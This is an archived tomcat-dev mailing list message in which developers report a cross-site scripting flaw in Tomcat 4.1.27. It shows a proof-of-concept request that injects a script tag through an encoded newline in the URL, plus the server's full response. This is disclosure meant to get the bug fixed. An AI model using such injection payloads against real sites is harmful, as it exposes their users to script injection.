tomcat-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "David Rees" <...@greenhydrant.com>
Subject Re: Jakarta Tomcat 4.1 XSS vulnerability
Date Mon, 29 Sep 2003 18:40:49 GMT
Anyone know how serious this is?

It also appears to affect Tomcat 4.1.27 when using mod_jk as well.  Below
is a sample trace of a HTTP session.

-Dave

> telnet localhost 8080
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
GET /666%0a%0a<script>alert("asdf");</script>666.jsp HTTP/1.0
Host: localhost

HTTP/1.1 404 /666

<script>alert("asdf");</script>666.jsp
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 29 Sep 2003 18:39:23 GMT
Server: Apache Coyote/1.0
Connection: close

<html><head><title>Apache Tomcat/4.1.27 - Error
report</title><STYLE><!--H1{font-family : sans-serif,Arial,Tahoma;color :
white;background-color : #0086b2;} H3{font-family :
sans-serif,Arial,Tahoma;color : white;background-color : #0086b2;}
BODY{font-family : sans-serif,Arial,Tahoma;color : black;background-color
: white;} B{color : white;background-color : #0086b2;} HR{color :
#0086b2;} --></STYLE> </head><body><h1>HTTP Status 404 - /666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</h1><HR
size="1" noshade><p><b>type</b> Status report</p><p><b>message</b>
<u>/666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp</u></p><p><b>description</b>
<u>The requested resource (/666

&lt;script&gt;alert(&quot;asdf&quot;);&lt;/script&gt;666.jsp) is not
available.</u></p><HR size="1" noshade><h3>Apache
Tomcat/4.1.27</h3></body></html>Connection closed by foreign host.

On Sun, September 28, 2003 at 3:14 am, Kan Ogawa sent the following
>
> Jakarta Tomcat 4.1 cross-site scripting vulnerability, which was
> reported last year, is not yet resolved.
>
> http://www.securityfocus.com/archive/82/288502/2002-08-16/2002-08-22/0
>
> I verified this vulnerability on Tomcat 4.1.27 with Coyote HTTP/1.1
> connector.
>
> http://localhost:8080/666%0a%0a<script>alert("asdf");</script>666.jsp
>
> On the other hand, on Tomcat 5.0, it was not reproduced.
> Do you neglect to resolve it to Tomcat 4.x, Tomcat committers?
>
> Regards,
>
> --
> Kan Ogawa
> super-creek@jcom.home.ne.jp


Mime
View raw message